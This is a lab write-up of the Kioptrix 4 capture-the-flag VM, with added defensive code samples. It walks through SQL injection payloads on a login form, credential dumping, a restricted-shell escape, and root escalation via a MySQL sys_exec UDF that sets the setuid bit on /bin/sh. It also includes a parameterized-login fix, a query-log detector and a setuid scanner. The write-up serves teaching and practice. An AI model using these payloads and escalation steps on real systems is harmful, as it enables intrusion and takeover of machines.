
Kioptrix 4

Machine Information

Host discovery

Since the target's IP address is not given, I used nmap to scan my network and found the target IP.

  • target IP: 192.168.188.137

Information Gathering

I always start with nmap for this kind of challenge.

nmap -p- -T4 192.168.188.137 -A -oA 192.168.188.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 21:08 +08
Nmap scan report for 192.168.188.137
Host is up (0.0027s latency).
Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:E5:04:7B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-01-25T08:09:25-05:00
|_clock-skew: mean: 2h30m00s, deviation: 3h32m08s, median: 0s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   2.72 ms 192.168.188.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds

Exploiting ports 139 & 445

Since these ports are open, I tried to get some information from them.

nmap -p 139,445 192.168.188.137 --script=smb-enum-users
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 23:00 +08
Nmap scan report for 192.168.188.137
Host is up (0.00098s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:E5:04:7B (VMware)

Host script results:
| smb-enum-users: 
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

After looking around, the only useful thing I managed to get was 5 usernames. I tried to access their SMB shares but had no luck. With that, I proceeded to port 80.

Exploiting port 80

I started by going through their website; it is a member login page.

Since it is a login page, I tried a few methods to log in, and eventually managed to log in by performing SQL injection.

Although we managed to log in, we could not get any useful information out of it. Since the login form is vulnerable to SQL injection, we could dump the database using sqlmap.

Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=qDRT&mypassword=-2986' OR 8863=8863#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=qDRT&mypassword=HMFk' AND (SELECT 9208 FROM (SELECT(SLEEP(5)))Tspw)-- YxFk&Submit=Login

Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

sqlmap successfully retrieved 2 credentials, which is useful. I tried to log in with both credentials, but sadly there is nothing else in the website. The credentials might be reused on other services as well, such as SSH.

Exploiting port 22

I managed to log in to their SSH server using john's credentials.

ssh john@192.168.188.137 -oHostKeyAlgorithms=+ssh-dss
john@192.168.188.137's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Although I managed to get a shell, it is a restricted shell where I could only run a few commands. Since it is a restricted shell, I looked for methods to escape it.

john:~$ echo os.system('/bin/bash') 
john@Kioptrix4:~$ ls -la
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john   61 2012-02-04 23:31 .bash_history
-rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john  306 2024-01-25 09:18 .lhistory
-rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
john@Kioptrix4:~$ whoami
john

Now that I have escaped the restricted shell, I can proceed with privilege escalation to get the root account.

Privilege Escalation

For privilege escalation, it is good to use linpeas.sh as it automatically performs various checks with a single script. After searching around, I remembered that the website is backed by MySQL, which might lead to privilege escalation.

john@Kioptrix4:/home$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
        session_register("myusername");
        session_register("mypassword");
        header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>
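The defect in checklogin.php above is that mypassword is dropped into the query string unescaped (the escaping lines for it are commented out), which is exactly what sqlmap exploited earlier. As an added example, not code from the original post or from the Kioptrix VM, here is the same login check reduced to Python with an in-memory SQLite table, constructed to mirror the two members rows sqlmap dumped, with the string-interpolated query beside a parameterized version that also stores salted password hashes instead of the plaintext the dump exposed. Function names, the hardened schema and the INJECTION string are my own; the injection string is a constructed equivalent of the page's boolean-based payload using SQLite's -- line comment in place of MySQL's #.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed rows mirroring the members table dumped by sqlmap on the page.
MEMBERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]

# Constructed equivalent of the page's boolean-based payload; SQLite uses
# "--" for a line comment where MySQL also accepts "#".
INJECTION = "x' OR 1=1 --"

PBKDF2_ROUNDS = 100_000


def build_vulnerable_db():
    """Plaintext password column, exactly as checklogin.php expects it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members (username, password) VALUES (?, ?)", MEMBERS)
    return conn


def check_login_vulnerable(conn, username, password):
    """Mirrors checklogin.php: the password is interpolated into the SQL text
    unescaped, so the password field can rewrite the WHERE clause."""
    sql = f"SELECT * FROM members WHERE username='{username}' AND password='{password}'"
    return len(conn.execute(sql).fetchall()) != 0


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as hex(salt)$hex(digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    # Constant-time comparison so the check cannot be timed byte by byte.
    return hmac.compare_digest(candidate.hex(), digest_hex)


def build_hardened_db():
    """Same accounts, but only salted hashes are stored (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO members (username, password_hash) VALUES (?, ?)",
        [(u, hash_password(p)) for u, p in MEMBERS],
    )
    return conn


def check_login_safe(conn, username, password):
    """Parameterized lookup: user input never becomes part of the SQL text,
    and the password is verified against a hash rather than inside the query."""
    row = conn.execute("SELECT password_hash FROM members WHERE username=?", (username,)).fetchone()
    if row is None:
        return False
    return verify_password(password, row[0])


if __name__ == "__main__":
    vuln = build_vulnerable_db()
    safe = build_hardened_db()
    print("vulnerable, injected password:", check_login_vulnerable(vuln, "qDRT", INJECTION))
    print("hardened,   injected password:", check_login_safe(safe, "qDRT", INJECTION))
    print("hardened,   real credentials: ", check_login_safe(safe, "john", "MyNameIsJohn"))
```

The vulnerable function accepts the injected password for a username that does not exist, because the query collapses to `... OR 1=1`; the parameterized version treats the same string as an opaque value and rejects it. Prepared statements fix the injection; hashing fixes the second problem the dump showed, that a database leak hands out working passwords.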

After looking into the file, the username used to log in to MySQL is root and there is no password.

john@Kioptrix4:/home$ mysql -u root  
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8614
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> exit
Bye

Based on the result, it is confirmed that MySQL can be logged into as root without a password. After researching MySQL, it is possible to escalate privileges and get the root account if a UDF (User-Defined Function) library is present. I looked to see if a UDF is installed on the system.

john@Kioptrix4:/home$ find / -name *udf* 2>/dev/null 
/usr/lib/lib_mysqludf_sys.so
/usr/share/mysql/mysql-test/r/udf.result
/usr/share/mysql/mysql-test/r/have_udf_example.require
/usr/share/mysql/mysql-test/r/have_udf.require
/usr/share/mysql/mysql-test/t/udf.test
/usr/share/mysql/mysql-test/include/have_udf.inc
/lib/modules/2.6.24-24-server/kernel/fs/udf
/lib/modules/2.6.24-24-server/kernel/fs/udf/udf.ko

It is confirmed that a UDF library is installed on the system. This means the privilege escalation method should be abusing the UDF through MySQL.

john@Kioptrix4:/home$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8615
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

Among the registered functions there is a sys_exec function. Since the name is sys_exec, I tried running it to execute a command and modify a file.

mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| NULL           | 
+----------------+
1 row in set (0.00 sec)

mysql> select sys_exec('chmod +s /bin/sh');
+------------------------------+
| sys_exec('chmod +s /bin/sh') |
+------------------------------+
| NULL                         | 
+------------------------------+
1 row in set (0.00 sec)
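The two mysql sessions above leave a clear trail if the server's general query log is enabled: a read of mysql.func followed by sys_exec() calls from a root@localhost connection. As an added example, not part of the original write-up, here is a small detector run over constructed general-log lines laid out in the log's timestamp / thread id / command / argument form (the entries are made up to resemble this session, not copied from the VM). It flags calls to the lib_mysqludf_sys command functions (sys_exec, and sys_eval, which the same library ships), CREATE FUNCTION ... SONAME statements that register a new UDF, and reads of mysql.func, and attributes each finding to the account seen on the thread's Connect line. Rule names and the sample log are my own.

```python
import re

# Constructed general-log excerpt resembling the session on the page
# (timestamp, thread id, command, argument). Not taken from the VM.
SAMPLE_LOG = """\
2024-01-25T13:09:20.000000Z  8614 Connect   root@localhost on
2024-01-25T13:09:21.000000Z  8614 Query     select @@version_comment limit 1
2024-01-25T13:09:22.000000Z  8614 Quit
2024-01-25T13:09:30.000000Z  8615 Connect   root@localhost on
2024-01-25T13:09:31.000000Z  8615 Query     select * from mysql.func
2024-01-25T13:09:40.000000Z  8615 Query     select sys_exec('id')
2024-01-25T13:09:50.000000Z  8615 Query     select sys_exec('chmod +s /bin/sh')
2024-01-25T13:10:00.000000Z  8620 Query     CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
"""

# timestamp, thread id, command word, then the rest of the line as the argument
LINE_RE = re.compile(r"^\S+\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Rule name -> pattern matched against the statement text (case-insensitive).
RULES = {
    # sys_exec and sys_eval are the command-running functions in lib_mysqludf_sys.
    "udf_exec":   re.compile(r"\b(sys_exec|sys_eval)\s*\(", re.I),
    # Registering a UDF from a shared object on disk.
    "udf_create": re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I),
    # Enumerating which UDFs are registered (the first thing done on the page).
    "udf_recon":  re.compile(r"\bmysql\.func\b", re.I),
}


def scan_general_log(text):
    """Return a list of (thread_id, account, rule, statement) findings."""
    accounts = {}   # thread id -> account from its Connect line
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue    # tolerate continuation lines or unrelated noise
        tid, cmd, arg = m.group("tid"), m.group("cmd"), m.group("arg").strip()
        if cmd == "Connect":
            accounts[tid] = arg.split(" on", 1)[0]   # "root@localhost on" -> "root@localhost"
            continue
        if cmd != "Query":
            continue
        for rule, pattern in RULES.items():
            if pattern.search(arg):
                # A thread whose Connect line predates the log excerpt is reported as "unknown".
                findings.append((tid, accounts.get(tid, "unknown"), rule, arg))
    return findings


if __name__ == "__main__":
    for tid, account, rule, stmt in scan_general_log(SAMPLE_LOG):
        print(f"thread {tid} ({account}): {rule}: {stmt}")
```

On a production server the cheaper fix is to make the trail unnecessary: give the MySQL root account a password, run mysqld as an unprivileged user so a UDF cannot touch root-owned files, and drop UDFs that are not needed, since sys_exec only escalated here because the daemon itself had the rights to chmod /bin/dash.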

Running commands like id does not return any output. Another way to confirm that the function works is to change a file's mode. The command I ran sets the SUID bit on /bin/sh so that I could get root if it works.

john@Kioptrix4:/home$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 2012-02-04 09:51 /bin/sh -> dash
john@Kioptrix4:/home$ ls -la /bin/dash
-rwsr-sr-x 1 root root 79988 2009-03-09 09:03 /bin/dash
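The setuid bit that just appeared on /bin/dash is the kind of change a host-integrity check catches quickly if a baseline of set-id files exists. As an added example, not from the original post, here is a small Python scanner that walks a tree, records every regular file with the setuid or setgid bit, and diffs the result against a saved baseline; demo_in_temp_dir() replays the page's sequence in a scratch directory (a placeholder file named dash gets its setuid bit set between two scans). Symlinks such as /bin/sh -> dash are skipped on purpose, since the link target is reported under its own path. All function names are mine.

```python
import os
import stat
import tempfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setid_files(root):
    """Walk root and return {path: permission bits} for regular files that
    carry the setuid or setgid bit. Symlinks are skipped (lstat, S_ISREG)."""
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue    # entry vanished or is unreadable; keep scanning
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID_BITS:
                found[path] = stat.S_IMODE(st.st_mode)
    return found


def diff_against_baseline(current, baseline):
    """Compare two {path: mode} maps and return (new, missing, changed) paths."""
    new = sorted(set(current) - set(baseline))
    missing = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(current) & set(baseline) if current[p] != baseline[p])
    return new, missing, changed


def demo_in_temp_dir():
    """Replay the page's sequence in a scratch directory: take a baseline, set
    the setuid bit on one file, re-scan. Returns (new basenames, missing, changed)."""
    with tempfile.TemporaryDirectory() as root:
        binary = os.path.join(root, "dash")
        with open(binary, "wb") as fh:
            fh.write(b"#!/bin/sh\n")    # placeholder content, not a real shell
        os.chmod(binary, 0o755)
        baseline = find_setid_files(root)   # nothing set-id yet
        os.chmod(binary, 0o4755)            # the setuid half of what chmod +s did to /bin/dash
        new, missing, changed = diff_against_baseline(find_setid_files(root), baseline)
        return [os.path.basename(p) for p in new], missing, changed


if __name__ == "__main__":
    print(demo_in_temp_dir())
```

In practice the baseline is written once from a known-good image (for example by scanning /bin, /sbin and /usr) and the comparison runs from cron; a new entry for a shell interpreter, as here, is about as unambiguous as host alerts get.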

/bin/sh in this case is a symlink to dash, and dash now has the SUID bit set on its executable. With that, we can get the root account just by running it.

john@Kioptrix4:/home$ dash
# whoami
root
# cat /root/congrats.txt 
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

While dash directly gave me the root account, bash does not give me root if I use the same method: bash drops an effective UID that differs from the real UID at startup, so I need to run bash -p to keep the SUID privileges and get the root account.

Things I learned from the machine

  • Privilege Escalation with UDF
  • Escape restricted shell
This post is licensed under CC BY 4.0 by the author.
